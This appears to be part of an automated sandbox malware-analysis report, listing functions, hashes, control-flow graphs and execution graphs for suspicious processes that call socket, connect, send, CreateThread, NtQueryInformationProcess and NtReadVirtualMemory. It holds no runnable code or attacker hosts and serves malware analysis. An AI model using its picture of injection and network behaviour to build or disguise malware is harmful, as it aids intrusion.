                                                                              • Instruction Fuzzy Hash: 2D324674904369DFEF31CF65C944BE9BBB8BB48314F0081E9D829A7241DB75AA84CF91
                                                                              Function 37AE4B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0$Flst
                                                                              • API String ID: 0-758220159
                                                                              • Opcode ID: 717200d39234af0ca8e034a9d0c5c95c0c523c70c00bdb6d127303cd7471a2f9
                                                                              • Instruction ID: 6f3113eee29ca64398389a73a3b986ff93320b08d6233a3deb4572d59a303d50
                                                                              • Opcode Fuzzy Hash: 717200d39234af0ca8e034a9d0c5c95c0c523c70c00bdb6d127303cd7471a2f9
                                                                              • Instruction Fuzzy Hash: BA51BCB5E01718CFEB14CF99C88479DFBF8EF847A4F14806AE4599B640EB749981CB90
                                                                              Function 37AB0485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 37AB0586
                                                                              • kLsE, xrefs: 37AB05FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                              • API String ID: 3446177414-2547482624
                                                                              • Opcode ID: cf58edcd36a2f81d980d7f99554393703c812ee5af00a27b4f798f9e7c0d22cc
                                                                              • Instruction ID: 09cbe6701147e8a9241d4fef44e44f6518c2642c94baa83c9b6cf3972c63a129
                                                                              • Opcode Fuzzy Hash: cf58edcd36a2f81d980d7f99554393703c812ee5af00a27b4f798f9e7c0d22cc
                                                                              • Instruction Fuzzy Hash: 0D51C1B5A0474ADFEB34DFA4C8807ABB7F8AF44310F00853ED9A593640EB74A505DB62
                                                                              Function 37AADF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: 0$0
                                                                              • API String ID: 3446177414-203156872
                                                                              • Opcode ID: dca083571c5ef9f60d93ba7cbbf504204781129645311e51b5451f71d181590e
                                                                              • Instruction ID: 39fecf6c254ee6080cbbfe7bb4855bd17db4b4e7622d0718efef46acd064bffc
                                                                              • Opcode Fuzzy Hash: dca083571c5ef9f60d93ba7cbbf504204781129645311e51b5451f71d181590e
                                                                              • Instruction Fuzzy Hash: C6417EB66087029FD340CF28C944A5BBBE4FB88354F00452EF898EB344D775EA05CB96

                                                                              Execution Graph

                                                                              Execution Coverage:4.7%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:52
                                                                              Total number of Limit Nodes:4
                                                                              execution_graph 5236 34e865e 5240 34e8684 5236->5240 5237 34e8719 5238 34e86ab SleepEx 5238->5240 5240->5237 5240->5238 5241 34e7178 5240->5241 5242 34e71b9 5241->5242 5243 34e7256 5242->5243 5244 34e723f SleepEx 5242->5244 5243->5240 5244->5242 5265 34f835f 5266 34f8364 5265->5266 5269 34f81e8 5266->5269 5268 34f8369 5272 34f4138 5269->5272 5271 34f81fd 5271->5268 5274 34f4144 5272->5274 5273 34f4149 5273->5271 5274->5273 5276 34e7a08 5274->5276 5278 34e7a2f 5276->5278 5277 34e7ab4 5277->5273 5278->5277 5279 34e7a86 CreateThread 5278->5279 5279->5273 5245 34f05db 5247 34f0631 5245->5247 5246 34f0662 send 5247->5246 5280 34f833b 5281 34f834d 5280->5281 5282 34f81e8 CreateThread 5281->5282 5283 34f8352 5282->5283 5248 34f049a 5250 34f04f0 5248->5250 5249 34f0521 socket 5250->5249 5284 34e792b 5286 34e7935 5284->5286 5285 34e7ab4 5286->5285 5287 34e7a86 CreateThread 5286->5287 5288 34f412a 5289 34f4144 5288->5289 5290 34e7a08 CreateThread 5289->5290 5291 34f4149 5289->5291 5290->5291 5251 34e7a08 5253 34e7a2f 5251->5253 5252 34e7ab4 5253->5252 5254 34e7a86 CreateThread 5253->5254 5255 34f0738 5256 34f0775 5255->5256 5257 34f07a6 closesocket 5256->5257 5258 34f0697 5260 34f06e1 5258->5260 5259 34f0712 connect 5260->5259 5261 34f1b23 5262 34f1b2a 5261->5262 5263 34f1b54 5262->5263 5264 34f1b90 LdrLoadDll 5262->5264 5264->5263

                                                                              Executed Functions

                                                                              Function 034E792B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.17602145741.0000000003470000.00000040.80000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3470000_RAVCpl64.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$Xnz/
                                                                              • API String ID: 0-726598149
                                                                              • Opcode ID: fa3ccd895342fe81973a45d6d1da094a1b23e9c1eb98c520cdb63f8c230da072
                                                                              • Instruction ID: 4ed3e269a81ddb1a36eff93269ce28f3168357ee0e72f872b6cc7c33f9c2fa9e
                                                                              • Opcode Fuzzy Hash: fa3ccd895342fe81973a45d6d1da094a1b23e9c1eb98c520cdb63f8c230da072
                                                                              • Instruction Fuzzy Hash: CD318B3554CA814FDB05DF78C0852AABBE1FF96364F1905AFC485CF242EA279042CB8A
                                                                              Function 034E7178 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 22 34e7178-34e71b3 23 34e71b9-34e71bd 22->23 24 34e7247-34e7250 23->24 25 34e71c3-34e71c6 23->25 24->23 26 34e7256-34e725f 24->26 25->24 27 34e71c8-34e723d call 34f42e8 call 34f42b8 call 34f4a28 25->27 28 34e729f-34e72bc 26->28 29 34e7261-34e7268 26->29 27->24 41 34e723f-34e7245 SleepEx 27->41 31 34e726a-34e7271 29->31 32 34e7284-34e728d 29->32 34 34e7278-34e7282 31->34 32->28 35 34e728f-34e7296 32->35 34->32 34->34 35->28 37 34e7298-34e7299 35->37 37->28 41->24
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.17602145741.0000000003470000.00000040.80000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3470000_RAVCpl64.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: c202671a0763d142d40dd2d0ac7723d2d3aa10783285073c09ba7147fa8437a7
                                                                              • Instruction ID: 67c4e0289ceb8ca4c8318c3d6e3091d54a636cdf8d6d4b0e41c73c2173b9b298
                                                                              • Opcode Fuzzy Hash: c202671a0763d142d40dd2d0ac7723d2d3aa10783285073c09ba7147fa8437a7
                                                                              • Instruction Fuzzy Hash: 4331EB7151CB488FDB28DF0CD8816EA77E0FB85312F54065EE58A8B206DB30E941CA9A
                                                                              Function 034E865E Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 42 34e865e-34e86a7 call 34e32f8 call 34f38c8 47 34e8719-34e8728 42->47 48 34e86a9 42->48 49 34e86ab-34e86c0 SleepEx 48->49 50 34e8706-34e870d 49->50 51 34e86c2-34e86c5 49->51 50->49 52 34e870f-34e8717 call 34e85e8 50->52 51->49 53 34e86c7-34e86d4 51->53 52->49 53->49 55 34e86d6-34e86dc 53->55 55->49 56 34e86de-34e86e4 55->56 56->49 58 34e86e6-34e86f7 call 34eebf8 call 34e7178 56->58 62 34e86fc-34e8704 call 34e72c8 58->62 62->49
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.17602145741.0000000003470000.00000040.80000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3470000_RAVCpl64.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 30176c129a7c1bb8b5d7365b178b39638c03243b272fe59a7d2a47523e6880f6
                                                                              • Instruction ID: 60d4715ad7cc7adf1171e7add6ba587fbee2e4d63cbe48e107fba93a9dec1c5e
                                                                              • Opcode Fuzzy Hash: 30176c129a7c1bb8b5d7365b178b39638c03243b272fe59a7d2a47523e6880f6
                                                                              • Instruction Fuzzy Hash: 3411D634624B188FDF55EB3889C07AA73E0FB48B42F4805FFD44ACF256CA348451878A
                                                                              Function 034F05DB Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 65 34f05db-34f0639 call 34ed168 68 34f063b-34f065c call 34f38c8 65->68 69 34f0662-34f068d send 65->69 68->69
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.17602145741.0000000003470000.00000040.80000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3470000_RAVCpl64.jbxd
                                                                              Similarity
                                                                              • API ID: send
                                                                              • String ID:
                                                                              • API String ID: 2809346765-0
                                                                              • Opcode ID: 183118666aef2b6625d41b9902662ee38e6e98827dd9e03df44d67e83c3b8500
                                                                              • Instruction ID: fdf2302087cd2ddb7423524e32970cb7760c5eb0f2a4a9d8d11573972bfe9555
                                                                              • Opcode Fuzzy Hash: 183118666aef2b6625d41b9902662ee38e6e98827dd9e03df44d67e83c3b8500
                                                                              • Instruction Fuzzy Hash: 0321633091CB048FCB58EF18A088659B7E0FB98310F04056EE84DCB25ADF708944CB95
                                                                              Function 034F0697 Relevance: 1.6, APIs: 1, Instructions: 66networkCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 72 34f0697-34f06e9 call 34ed1f8 75 34f06eb-34f070c call 34f38c8 72->75 76 34f0712-34f0735 connect 72->76 75->76
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.17602145741.0000000003470000.00000040.80000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3470000_RAVCpl64.jbxd
                                                                              Similarity
                                                                              • API ID: connect
                                                                              • String ID:
                                                                              • API String ID: 1959786783-0
                                                                              • Opcode ID: ab08389493bee3b9fb2e1f267bd2ae7b18b5beace8f1b157c596daf08059419d
                                                                              • Instruction ID: 379f7d29eed9cd3d171c7fdabc925348fcd0392b2e3d961297ac39534099faf5
                                                                              • Opcode Fuzzy Hash: ab08389493bee3b9fb2e1f267bd2ae7b18b5beace8f1b157c596daf08059419d
                                                                              • Instruction Fuzzy Hash: 8411303091CB488FCB58EF18A08865677E1FB5C301F0405AFE94DCB25ADF708944CB9A
                                                                              Function 034F049A Relevance: 1.6, APIs: 1, Instructions: 65networkCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 79 34f049a-34f04f8 call 34ed038 82 34f04fa-34f051b call 34f38c8 79->82 83 34f0521-34f0542 socket 79->83 82->83
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.17602145741.0000000003470000.00000040.80000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3470000_RAVCpl64.jbxd
                                                                              Similarity
                                                                              • API ID: socket
                                                                              • String ID:
                                                                              • API String ID: 98920635-0
                                                                              • Opcode ID: 738f26fdd77f4b3bf41143cd99b87fc7bda5ef9dbb1e172aa84bd023b17c18d2
                                                                              • Instruction ID: b4bd1f0cae92a9d693dee56a62577f6a83e0433dac326251b836b7ea9cefbefd
                                                                              • Opcode Fuzzy Hash: 738f26fdd77f4b3bf41143cd99b87fc7bda5ef9dbb1e172aa84bd023b17c18d2
                                                                              • Instruction Fuzzy Hash: D3114F7091CB448FCF48EF18908465ABBE1FB9D300F14017EE94DCB24ADA709544C799
                                                                              Function 034E7A08 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.17602145741.0000000003470000.00000040.80000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3470000_RAVCpl64.jbxd
                                                                              Similarity
                                                                              • API ID: CreateThread
                                                                              • String ID:
                                                                              • API String ID: 2422867632-0
                                                                              • Opcode ID: d2e1fad473ad03a6c7fe1eeed6bd301258dbf2d309bc6ce7c13dfcd41d2d60f3
                                                                              • Instruction ID: ccb4c9599265849da29b39392b49133449c95de275c979eaa4a493a5c698da1e
                                                                              • Opcode Fuzzy Hash: d2e1fad473ad03a6c7fe1eeed6bd301258dbf2d309bc6ce7c13dfcd41d2d60f3
                                                                              • Instruction Fuzzy Hash: 1811C034254B098FEB04EF29C0887A6B7E0FB88359F1942BED459CF290DB7985458B96
                                                                              Function 034F1B23 Relevance: 1.6, APIs: 1, Instructions: 52libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 101 34f1b23-34f1b52 call 34f4848 105 34f1b5f-34f1b6b call 34f7d58 101->105 106 34f1b54-34f1b5e 101->106 109 34f1b6d-34f1b74 call 34f8028 105->109 110 34f1b79-34f1b8e call 34f4038 105->110 109->110 114 34f1bac-34f1bb4 110->114 115 34f1b90-34f1ba5 LdrLoadDll 110->115 115->114
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.17602145741.0000000003470000.00000040.80000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3470000_RAVCpl64.jbxd
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: b31766a773c638b2a1b1ffa329d123d3c511829b8ec71a431a16a6a5b1cef43e
                                                                              • Instruction ID: c005e1dd14abea2f3a8f5b16b3f16fa89696a31deedbf5916b399d811394898f
                                                                              • Opcode Fuzzy Hash: b31766a773c638b2a1b1ffa329d123d3c511829b8ec71a431a16a6a5b1cef43e
                                                                              • Instruction Fuzzy Hash: 8101D435218B098FD724E726C8C8A6BB3E4FFD8304F48052F994ECA250EE39D244C646
                                                                              Function 034F0738 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 116 34f0738-34f077d call 34ed288 119 34f077f-34f07a0 call 34f38c8 116->119 120 34f07a6-34f07b9 closesocket 116->120 119->120
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.17602145741.0000000003470000.00000040.80000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3470000_RAVCpl64.jbxd
                                                                              Similarity
                                                                              • API ID: closesocket
                                                                              • String ID:
                                                                              • API String ID: 2781271927-0
                                                                              • Opcode ID: 4d4ba5f31d0269f8d77df5daea61cfdc5f39e0472f98af54e051310692a54deb
                                                                              • Instruction ID: 6def2a37ff7db591a53ba12b612467554a2be830d8b83544667b1e5277405031
                                                                              • Opcode Fuzzy Hash: 4d4ba5f31d0269f8d77df5daea61cfdc5f39e0472f98af54e051310692a54deb
                                                                              • Instruction Fuzzy Hash: 91010C3451CB489FDB90FF28D08879BB7E1FBA8341F44466EE98DCB255DB3481448B56

                                                                              Execution Graph

                                                                              Execution Coverage:0.4%
                                                                              Dynamic/Decrypted Code Coverage:88.2%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:17
                                                                              Total number of Limit Nodes:2
                                                                              execution_graph 82814 4da1e98 82815 4da1ef0 82814->82815 82816 4da1f24 82815->82816 82819 4d9f038 82815->82819 82818 4da1f01 82820 4d9f05d 82819->82820 82821 4d9f1da NtQueryInformationProcess 82820->82821 82824 4d9f24d 82820->82824 82822 4d9f214 82821->82822 82823 4d9f2f2 NtReadVirtualMemory 82822->82823 82822->82824 82823->82824 82824->82818 82825 8e9a67 NtClose 82826 8e9a98 82825->82826 82828 4ab2b20 82830 4ab2b2a 82828->82830 82831 4ab2b3f LdrInitializeThunk 82830->82831 82832 4ab2b31 82830->82832 82841 4ab29f0 LdrInitializeThunk

                                                                              Executed Functions

                                                                              Function 04D9F038 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 541nativeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 4d9f038-4d9f05b 1 4d9f079-4d9f099 call 4da1308 call 4d9d0a8 0->1 2 4d9f05d-4d9f074 call 4da12e8 0->2 8 4d9f68a-4d9f695 1->8 9 4d9f09f-4d9f1ab call 4d9ef68 call 4da1308 call 4da5274 call 4d90398 call 4da08c8 call 4d90398 call 4da08c8 call 4da2fd8 1->9 2->1 26 4d9f67e-4d9f685 call 4d9ef68 9->26 27 4d9f1b1-4d9f24b call 4d90398 call 4da08c8 NtQueryInformationProcess call 4da1308 call 4d90398 call 4da08c8 9->27 26->8 39 4d9f24d-4d9f25a 27->39 40 4d9f25f-4d9f2db call 4da5282 call 4d90398 call 4da08c8 27->40 39->26 40->39 49 4d9f2e1-4d9f2f0 call 4da52ac 40->49 52 4d9f33d-4d9f383 call 4d90398 call 4da08c8 call 4da3938 49->52 53 4d9f2f2-4d9f333 NtReadVirtualMemory call 4da1ff8 49->53 62 4d9f3a2-4d9f49e call 4d90398 call 4da08c8 call 4da52ba call 4d90398 call 4da08c8 call 4da32f8 call 4da12b8 * 3 call 4da52ac 52->62 63 4d9f385-4d9f39d 52->63 56 4d9f338 53->56 56->26 86 4d9f4d1-4d9f4e6 call 4da52ac 62->86 87 4d9f4a0-4d9f4cf call 4da52ac call 4da12b8 call 4da530e call 4da52c8 62->87 63->26 92 4d9f4e8-4d9f50a call 4da2aa8 86->92 93 4d9f50f-4d9f521 call 4da1f38 86->93 98 4d9f526-4d9f530 87->98 92->93 93->98 100 4d9f5f5-4d9f65e call 4d90398 call 4da08c8 call 4da3c58 98->100 101 4d9f536-4d9f586 call 4d90398 call 4da08c8 call 4da3618 call 4da52ac 98->101 100->26 126 4d9f660-4d9f679 call 4da12e8 100->126 120 4d9f588-4d9f5b1 call 4da5358 call 4da530e 101->120 121 4d9f5bb-4d9f5c3 call 4da52ac 101->121 120->121 121->100 130 4d9f5c5-4d9f5d0 121->130 126->26 130->100 132 4d9f5d2-4d9f5f0 call 4da3f78 130->132 132->100
                                                                              APIs
                                                                              • NtQueryInformationProcess.NTDLL ref: 04D9F1F9
                                                                              • NtReadVirtualMemory.NTDLL ref: 04D9F30D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16928575855.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4d90000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InformationMemoryProcessQueryReadVirtual
                                                                              • String ID: 0$~,VH$OR+
                                                                              • API String ID: 1498878907-4020732180
                                                                              • Opcode ID: 5d4d39e875c25aa832bc67a7086d0fc650dbfabbd9594b02e507059220aecd91
                                                                              • Instruction ID: e4b59be7d9d7a6175d5f74e47c4132f570d04204ceffa2de5fa3b5058ccd8536
                                                                              • Opcode Fuzzy Hash: 5d4d39e875c25aa832bc67a7086d0fc650dbfabbd9594b02e507059220aecd91
                                                                              • Instruction Fuzzy Hash: 34023F70618A8C9FDFA5EF68C894ADE77E1FB99304F40061ED88AC7244DF34E6458B52
                                                                              Function 008E9A67 Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 134 8e9a67-8e9a90 NtClose 135 8e9a98-8e9aa5 134->135
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16925701076.00000000008C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_8c0000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: bd7927d976b0e10c3aa9637b3a0958410aa6209ded68882e1a7740e87cbd5ffc
                                                                              • Instruction ID: 5cddf97871bb505070435a55c5f37363b8e4718735b2c40b37f3ee4e63c7664d
                                                                              • Opcode Fuzzy Hash: bd7927d976b0e10c3aa9637b3a0958410aa6209ded68882e1a7740e87cbd5ffc
                                                                              • Instruction Fuzzy Hash: 1EE07D5659D3CA8CC700BBF4C81435E7FA0AE06734B1C8F9CC8F10A487CA011C86CB00
                                                                              Function 04AB2CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 151 4ab2cf0-4ab2cfc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 49d6fe2caa93ae328e5487e706186fb2e2a4f69f26d08a383fe43127b7d44727
                                                                              • Instruction ID: 79fb835083f53ff5b969b715eb7c46f693cce3a9e61c703eeb514e8210322d07
                                                                              • Opcode Fuzzy Hash: 49d6fe2caa93ae328e5487e706186fb2e2a4f69f26d08a383fe43127b7d44727
                                                                              • Instruction Fuzzy Hash: E9900221242041527D85B55845045074006ABE02C6791C41EA1415990CC53AE856E721
                                                                              Function 04AB2C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 150 4ab2c30-4ab2c3c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: e178a48f50c5ca64819f3655ea3d7a88113d9ac794d0734e082708c8d0c4e0f0
                                                                              • Instruction ID: 2617b101b9fa86f212733ba6c3a869d2317b50e94d22aa41ec9d956181ac9356
                                                                              • Opcode Fuzzy Hash: e178a48f50c5ca64819f3655ea3d7a88113d9ac794d0734e082708c8d0c4e0f0
                                                                              • Instruction Fuzzy Hash: F390022921300002F9C07558550860A00059BD1287F91D81DA0016598CC939D8696321
                                                                              Function 04AB2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 152 4ab2d10-4ab2d1c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 83d6e5e082b0c5d97e6232f1e41431018f0e2472cfa2298efc8e33381f4244dc
                                                                              • Instruction ID: 53a17c88de58fedb2c4dcdcc161c3431e964bbd36450c8002a49a77cc6080d65
                                                                              • Opcode Fuzzy Hash: 83d6e5e082b0c5d97e6232f1e41431018f0e2472cfa2298efc8e33381f4244dc
                                                                              • Instruction Fuzzy Hash: F790023120100413F9517558460470700099BD02C6F91C81EA0425598DD67AD952B221
                                                                              Function 04AB2E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: afa3af3055752d97f2bc7723a213c8aa3f025232f3b70cdf29b1f5e9307f1bec
                                                                              • Instruction ID: 7899796492c72f06630fe4d0b7385767a6c1e073dc5c0bca2ec39f99b92bc34b
                                                                              • Opcode Fuzzy Hash: afa3af3055752d97f2bc7723a213c8aa3f025232f3b70cdf29b1f5e9307f1bec
                                                                              • Instruction Fuzzy Hash: 4490026134100442F94075584514B060005DBE1386F51C41DE1065594DC63DDC527226
                                                                              Function 04AB2F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 5659f236ce9fdf59961b8b3fb0d878dab9da94b24fd5f8839588c39f406c4a4a
                                                                              • Instruction ID: 43205dfa78b24f046f620d38cb2b15b8e60f0f8ab695ae32bdf54afea295cfdb
